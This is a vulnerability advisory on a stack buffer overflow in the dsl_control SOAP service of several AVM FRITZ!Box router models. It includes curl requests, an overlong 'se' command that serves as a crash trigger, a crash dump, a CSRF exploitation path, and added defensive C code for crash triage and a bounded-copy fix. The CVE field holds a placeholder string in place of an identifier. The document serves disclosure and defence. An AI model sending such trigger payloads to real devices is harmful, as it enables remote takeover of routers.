Advisory: AVM FRITZ!Box: Remote Code Execution via Buffer Overflow

RedTeam Pentesting discovered that several models of the AVM FRITZ!Box
are vulnerable to a stack-based buffer overflow, which allows attackers
to execute arbitrary code on the device.


Details
=======

Product: AVM FRITZ!Box 3272/7272, 3370/3390/3490, 7312/7412,
                       7320/7330 (SL), 736x (SL) and 7490
Affected Versions: versions prior to 6.30 (all models) [0]
Fixed Versions: >= 6.30 (all models) [0]
Vulnerability Type: Buffer Overflow
Security Risk: high
Vendor URL: http://avm.de/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-001
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
============

FRITZ!Box is the brand name of SOHO routers/CPEs manufactured by AVM
GmbH. The FRITZ!Box usually combines features such as an xDSL modem, a
wifi access point, routing, VoIP, NAS and DECT.


More Details
============

When examining the running processes on a FRITZ!Box, it was discovered
that the program dsl_control listens on TCP port 8080:

# netstat -anp | grep dsl_control
tcp   0   0 0.0.0.0:8080   0.0.0.0:*   LISTEN   849/dsl_control

By sending an HTTP request to the service, it can be seen in the
server's response that the daemon expects SOAP messages (output
shortened):

$ curl --silent http://fritz.box:8080/ | xmllint -format -
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope [...]>
  <SOAP-ENV:Body>
    <SOAP-ENV:Fault SOAP-ENV:encodingStyle="[...]">
      <faultcode>SOAP-ENV:Client</faultcode>
      <faultstring>HTTP GET method not implemented</faultstring>
    </SOAP-ENV:Fault>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

After examining the dsl_control binary by using GNU strings and
performing a web search for some of the resulting values, it was quickly
discovered that parts of the daemon's source code can be found in the
Git repository of the dd-wrt firmware[1].

In order to retrieve the list of all commands that are implemented by
the daemon, the following SOAP message can be sent to the server,
specifying an ifx:DslCpeCliAccess element containing an empty command
element (output shortened):

$ curl --silent http://fritz.box:8080/ --data '
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/[...]"
 xmlns:ifx="urn:dsl_api">
  <SOAP-ENV:Body>
      <ifx:DslCpeCliAccess>
          <command></command>
      </ifx:DslCpeCliAccess>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>' | xmllint -format -
<?xml version="1.0" encoding="UTF-8"?>
[...]
    <ifx:DslCpeCliAccessResponse>
      <result>avmcr, avmcrmr, avmcrms, avmcw, avmdsmmcs, avmhwrfit,
avmpet, avmvig, acog, acos, acs, alf, asecg, asecs, asg, aufg, alig,
bbsg, bpstg, bpsg, ccadbgmlg, ccadbgmls, dbgmlg, dbgmls, dsmcg, dsmcs,
dsmmcg, dsmmcs, dsmstatg, dsmsg, dsnrg, dmms, dms, esmcg, esmcs, fddg,
fdsg, fpsg, g997amdpfcg, g997amdpfcs, g997amlfcg, g997amlfcs, g997bang,
g997bansg, g997cdrtcg, g997cdrtcs, g997csg, g997dpfsg, g997dfr,
g997dhling, g997dhlinsg, g997dhlogg, g997dqlng, g997dsnrg, g997fpsg,
g997gang, g997gansg, g997lstg, g997lacg, g997lacs, g997lfsg, g997lisg,
g997lig, g997listrg, g997lis, g997lsg, g997lspbg, g997ltsg, g997lpmcg,
g997lpmcs, g997pmsft, g997pmsg, g997racg, g997racs, g997sang, g997sansg,
g997upbosg, g997xtusecg, g997xtusecs, g997xtusesg, help, hsdg, ics, isg,
lecg, lfcg, lfcs, lfsg, locg, locs, lsg, llsg, llcg, llcs, mlsg, nsecg,
nsecs, osg, pm15meet, pmbms, pmcc15mg, pmcc1dg, pmccsg, pmcctg,
pmchs15mg, pmchs1dg, pmct15mg, pmct15ms, pmct1dg, pmct1ds, pmcg, pmcs,
pmdpc15mg, pmdpc1dg, pmdpcsg, pmdpctg, pmdpfc15mg, pmdpfc1dg, pmdpfcsg,
pmdpfctg, pmdpfhs15mg, pmdpfhs1dg, pmdphs15mg, pmdphs1dg, pmdpt15mg,
pmdpt15ms, pmdpt1dg, pmdpt1ds, pmetr, pmlesc15mg, pmlesc1dg, pmlescsg,
pmlesctg, pmleshs15mg, pmleshs1dg, pmlic15mg, pmlic1dg, pmlicsg,
pmlictg, pmlihs15mg, pmlihs1dg, pmlit15mg, pmlit15ms, pmlit1dg,
pmlit1ds, pmlsc15mg, pmlsc1dg, pmlscsg, pmlsctg, pmlshs15mg, pmlshs1dg,
pmlst15mg, pmlst15ms, pmlst1dg, pmlst1ds, pmrtc15mg, pmrtc1dg, pmrtcsg,
pmrtctg, pmrths15mg, pmrths1dg, pmrtt15mg, pmrtt15ms, pmrtt1dg,
pmrtt1ds, pmr, pmsmg, pmsms, ptsg, quit, rtsg, rccg, rccs, rsss, rusg,
se, sicg, sics, sisg, tcpmistart, tcpmistop, tmcs, tmsg, vig, </result>
    </ifx:DslCpeCliAccessResponse>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

As can be seen in the listing, the server implements several commands.
Many of them can be accessed without any authentication. One of the
commands which was further examined is the 'se' or 'ScriptExecute'
command. It is defined by the file dsl_cpe_cli_access.c, which registers
the function DSL_CPE_CLI_ScriptExecute as the corresponding handler:

[...]
   DSL_CPE_CLI_CMD_ADD_COMM (
      "se",
      "ScriptExecute",
      DSL_CPE_CLI_ScriptExecute,
      g_sSe);
[...]

The following listing shows dd-wrt's implementation of the command,
which is also part of the file dsl_cpe_cli_access.c (shortened):

DSL_CLI_LOCAL DSL_int_t DSL_CPE_CLI_ScriptExecute(
   DSL_int_t fd,
   DSL_char_t *pCommands,
   DSL_CPE_File_t *out)
{
   DSL_int_t ret = 0;
   DSL_char_t sFileName[DSL_MAX_COMMAND_LINE_LENGTH] = {0};

   if (DSL_CPE_CLI_CheckParamNumber(pCommands, 1, DSL_CLI_EQUALS) ==
      DSL_FALSE)
   {
      return -1;
   }

   DSL_CPE_sscanf (pCommands, "%s", sFileName);

   [...]

   return 0;
}

As can be seen in the listing, the function first checks whether
another parameter is given by calling the function
DSL_CPE_CLI_CheckParamNumber(). If this is the case, the code proceeds
to call the function DSL_CPE_sscanf() in order to copy the value of the
parameter pCommands to the local char array sFileName. Because the
format string "%s" is provided to the DSL_CPE_sscanf() function, no
restriction applies to how much data is copied to the array. Therefore,
an overlong argument passed to the function may possibly exceed the
array's bounds, leading to a buffer overflow. In order to verify that
this is the case, the following SOAP message was stored in the file
trigger.xml, containing 300 capital A characters as the argument for the
'se' command (output shortened):

<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/[...]/"
 xmlns:ifx="urn:dsl_api">
  <SOAP-ENV:Body>
      <ifx:DslCpeCliAccess>
          <command>se AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</command>
      </ifx:DslCpeCliAccess>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Afterwards, curl was used to send the SOAP message to the service:

$ curl --data @trigger.xml http://fritz.box:8080/
curl: (52) Empty reply from server

As indicated by curl's output, no HTTP reply was received. Instead, the
connection was closed. When accessing the device by using telnet, the
following crash dump is printed when sending the request, clearly
showing that the presumed buffer overflow was triggered:

dsl_control[841] crashed at 41414140 [...] accessing 0x41414140
Version: 06.24
at: 2ac783d8 v0: 00000000 v1: ffffffff
a0: 2ac0ac08 a1: 00000001 a2: 00473420 a3: 00000001
t0: 2aab5280 t1: 8ead1b2c t2: 41414141 t3: 41414141
t4: 41414141 t5: 00000001 t6: 2ac4d788 t7: 41414141
s0: 41414141 s1: 41414141 s2: 00000000 s3: 2ad800b0
s4: 2ad800b0 s5: 00000000 s6: 00080000 s7: 2ab52358
t8: 00000000 t9: 2ab3dc10
gp: 00473420 sp: 2ad7fcd0 fp: 2ad7ffe0 ra: 41414141

As seen in the crash dump, several saved registers were overwritten by
the capital 'A' characters (0x41) provided in the SOAP message. Among
those registers is the ra register, which stores the return address of
the current function call, thus allowing an attacker to directly alter
the control flow. This behaviour can be exploited in order to execute
arbitrary code. Due to firewall restrictions, the service is only
accessible from within the internal network connected to the FRITZ!Box.
However, it is also possible to exploit this vulnerability by utilising
cross-site request forgery, allowing typical "drive-by" exploitation
through a user's web browser.
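
The conclusion drawn from the crash dump above (saved registers, and in
particular ra, overwritten by the 0x41 pattern) is the kind of check a
reviewer makes when triaging a crash report to decide whether it is a
plain data corruption or a control-flow hijack. The following C program
is an added example, not code from the advisory, from AVM or from
dd-wrt: it parses a MIPS register dump in the format printed above
(the sample input is the advisory's own dump, embedded as a constant)
and reports which saved registers hold a given pattern. All function
and type names are this example's own.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_REGS 40

typedef struct {
    char name[8];          /* register name without the trailing ':' */
    unsigned long value;   /* saved 32-bit value from the dump */
} SavedReg;

/* Constructed sample input: the crash dump printed in the advisory. */
static const char *SAMPLE_DUMP =
    "dsl_control[841] crashed at 41414140 [...] accessing 0x41414140\n"
    "Version: 06.24\n"
    "at: 2ac783d8 v0: 00000000 v1: ffffffff\n"
    "a0: 2ac0ac08 a1: 00000001 a2: 00473420 a3: 00000001\n"
    "t0: 2aab5280 t1: 8ead1b2c t2: 41414141 t3: 41414141\n"
    "t4: 41414141 t5: 00000001 t6: 2ac4d788 t7: 41414141\n"
    "s0: 41414141 s1: 41414141 s2: 00000000 s3: 2ad800b0\n"
    "s4: 2ad800b0 s5: 00000000 s6: 00080000 s7: 2ab52358\n"
    "t8: 00000000 t9: 2ab3dc10\n"
    "gp: 00473420 sp: 2ad7fcd0 fp: 2ad7ffe0 ra: 41414141\n";

/* Extract "name: hexvalue" pairs. A name token is 2 or 3 characters
   followed by ':', so "Version:" and free text such as "crashed at"
   are skipped; the value must parse completely as hex. */
int parse_regs(const char *dump, SavedReg *regs, int max)
{
    int count = 0;
    const char *p = dump;
    while (*p && count < max) {
        while (*p && isspace((unsigned char)*p)) p++;
        const char *tok = p;
        while (*p && !isspace((unsigned char)*p)) p++;
        size_t len = (size_t)(p - tok);
        if (len < 3 || len > 4 || tok[len - 1] != ':')
            continue;
        while (*p && isspace((unsigned char)*p)) p++;
        const char *val = p;
        while (*p && !isspace((unsigned char)*p)) p++;
        char *end;
        unsigned long v = strtoul(val, &end, 16);
        if (val == p || end != p)
            continue;                       /* not a plain hex value */
        memcpy(regs[count].name, tok, len - 1);
        regs[count].name[len - 1] = '\0';
        regs[count].value = v;
        count++;
    }
    return count;
}

/* Number of register pairs recognised in the dump. */
int saved_reg_count(const char *dump)
{
    SavedReg regs[MAX_REGS];
    return parse_regs(dump, regs, MAX_REGS);
}

/* Count saved registers whose value equals the pattern and, if out is
   given, list their names comma separated. */
int count_tainted(const char *dump, unsigned long pattern, char *out, size_t outlen)
{
    SavedReg regs[MAX_REGS];
    int n = parse_regs(dump, regs, MAX_REGS);
    int found = 0;
    if (out && outlen) out[0] = '\0';
    for (int i = 0; i < n; i++) {
        if (regs[i].value != pattern) continue;
        if (out && outlen) {
            if (found) strncat(out, ",", outlen - strlen(out) - 1);
            strncat(out, regs[i].name, outlen - strlen(out) - 1);
        }
        found++;
    }
    return found;
}

/* ra holds the return address: when it equals the pattern the caller's
   control flow is attacker-influenced, not merely a data corruption. */
int ra_is_tainted(const char *dump, unsigned long pattern)
{
    SavedReg regs[MAX_REGS];
    int n = parse_regs(dump, regs, MAX_REGS);
    for (int i = 0; i < n; i++)
        if (strcmp(regs[i].name, "ra") == 0)
            return regs[i].value == pattern;
    return 0;
}

int main(void)
{
    char names[256];
    int n = count_tainted(SAMPLE_DUMP, 0x41414141UL, names, sizeof names);
    printf("%d saved registers hold the pattern: %s\n", n, names);
    printf("ra controlled: %s\n",
           ra_is_tainted(SAMPLE_DUMP, 0x41414141UL) ? "yes" : "no");
    return 0;
}
```

On the advisory's dump this reports seven registers (t2, t3, t4, t7,
s0, s1 and ra) holding 0x41414141; the separate ra check is what turns
"the process crashed" into "the return address is attacker-controlled",
which is the finding that justifies the high risk rating.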


Workaround
==========

None.


Fix
===

Affected users should upgrade to a fixed firmware version as soon as
possible.
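
For readers maintaining similar code, the following C is an added
example of what the code-level fix looks like. It is not the vendor's
actual fix and not dd-wrt's code: it keeps the fixed-size sFileName
array from the listing above but replaces the unbounded "%s" scan with
two bounded variants, one that copies the token manually and rejects
anything that does not fit, and one that keeps sscanf but uses a field
width plus "%n" to detect truncation. The value 256 for
DSL_MAX_COMMAND_LINE_LENGTH is assumed (the advisory does not state
it), and all function names other than the array and macro are this
example's own.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed value: the advisory does not state DSL_MAX_COMMAND_LINE_LENGTH. */
#define DSL_MAX_COMMAND_LINE_LENGTH 256

/* Copy the first whitespace-delimited token of pCommands (what "%s" would
   scan) into out, refusing anything that does not fit. Returns the token
   length, or -1 if there is no token or it would exceed the buffer. */
int copy_argument_bounded(const char *pCommands, char *out, size_t outlen)
{
    size_t n = 0;
    if (pCommands == NULL || out == NULL || outlen == 0)
        return -1;
    out[0] = '\0';
    while (*pCommands && isspace((unsigned char)*pCommands))
        pCommands++;                          /* "%s" skips leading blanks */
    while (pCommands[n] && !isspace((unsigned char)pCommands[n]))
        n++;                                  /* measure the token */
    if (n == 0)
        return -1;                            /* missing argument */
    if (n >= outlen)
        return -1;                            /* overlong: reject, never overflow */
    memcpy(out, pCommands, n);
    out[n] = '\0';
    return (int)n;
}

/* Hardened counterpart of the argument handling in DSL_CPE_CLI_ScriptExecute:
   same fixed-size sFileName as in the dd-wrt listing, but the unbounded
   DSL_CPE_sscanf(pCommands, "%s", sFileName) is replaced by the bounded copy.
   Returns 0 on success, -1 when the argument is rejected. */
int script_execute_hardened(const char *pCommands)
{
    char sFileName[DSL_MAX_COMMAND_LINE_LENGTH] = {0};
    if (copy_argument_bounded(pCommands, sFileName, sizeof sFileName) < 0)
        return -1;
    /* [...] the script named in sFileName would be opened and run here */
    return 0;
}

/* If sscanf has to stay, a field width (buffer size minus one, here 255)
   caps the copy. Unlike the variant above it truncates silently, so %n is
   used to detect that the token continued past the buffer and reject it. */
int script_execute_width_limited(const char *pCommands)
{
    char sFileName[DSL_MAX_COMMAND_LINE_LENGTH] = {0};
    int consumed = 0;
    if (sscanf(pCommands, "%255s%n", sFileName, &consumed) != 1)
        return -1;                            /* no token at all */
    if (pCommands[consumed] != '\0' &&
        !isspace((unsigned char)pCommands[consumed]))
        return -1;                            /* token was cut off: too long */
    return 0;
}

/* Constructed input: the 300 capital A characters from trigger.xml. */
const char *make_trigger(void)
{
    static char trigger[301];
    memset(trigger, 'A', 300);
    trigger[300] = '\0';
    return trigger;
}

/* Exercise copy_argument_bounded with a deliberately small 8-byte buffer. */
int copy_into_small_buffer(const char *arg)
{
    char small[8];
    return copy_argument_bounded(arg, small, sizeof small);
}

int main(void)
{
    printf("normal argument:  %d\n", script_execute_hardened("script.sh"));
    printf("300 x 'A':        %d\n", script_execute_hardened(make_trigger()));
    printf("width-limited:    %d\n", script_execute_width_limited(make_trigger()));
    return 0;
}
```

Rejecting an overlong argument rather than truncating it is the safer
default here: a silently truncated file name would make the handler
operate on a different file than the one requested, and the field width
in the sscanf variant has to be kept in sync with the array size by
hand, which is exactly the kind of coupling that rots over time.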


Security Risk
=============

After successful exploitation, attackers gain root privileges on the
attacked device. This allows attackers to eavesdrop on traffic and to
initiate and receive arbitrary phone calls, if the device is configured
for telephony. Furthermore, backdoors may be installed to allow
persistent access to the device.

In order to exploit the vulnerability, attackers either need to be able
to connect to the service directly, i.e. from the LAN, or indirectly via
an attacker-controlled website that is visited by a FRITZ!Box user.
This website can exploit the vulnerability via cross-site request
forgery, connecting to the service via the attacked user's browser.
Therefore, it is estimated that the vulnerability poses a high risk.


Timeline
========

2015-02-26 Vulnerability identified
2015-03-26 CVE number requested
2015-03-26 Vendor notified
2015-04-30 RedTeam Pentesting reviewed fixed version by order of vendor
2015-06-09 Vendor released fixed public beta (7490)
2015-07-16 Vendor started releasing fixed versions (7360 and 7490)
2015-10-01 Vendor finished releasing fixed versions (other models [0])
2015-11-27 Advisory release postponed to maximize patch distribution
2016-01-07 Advisory released


References
==========

[0] https://avm.de/service/sicherheitshinweise/
[1] https://github.com/mirror/dd-wrt/tree/master/src/router/dsl_cpe_control


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. In this way, security weaknesses
in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

-- 
RedTeam Pentesting GmbH                     Tel.: +49 241 510081-0
Dennewartstr. 25-27                         Fax : +49 241 510081-99
52068 Aachen                                https://www.redteam-pentesting.de
Germany                                     Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen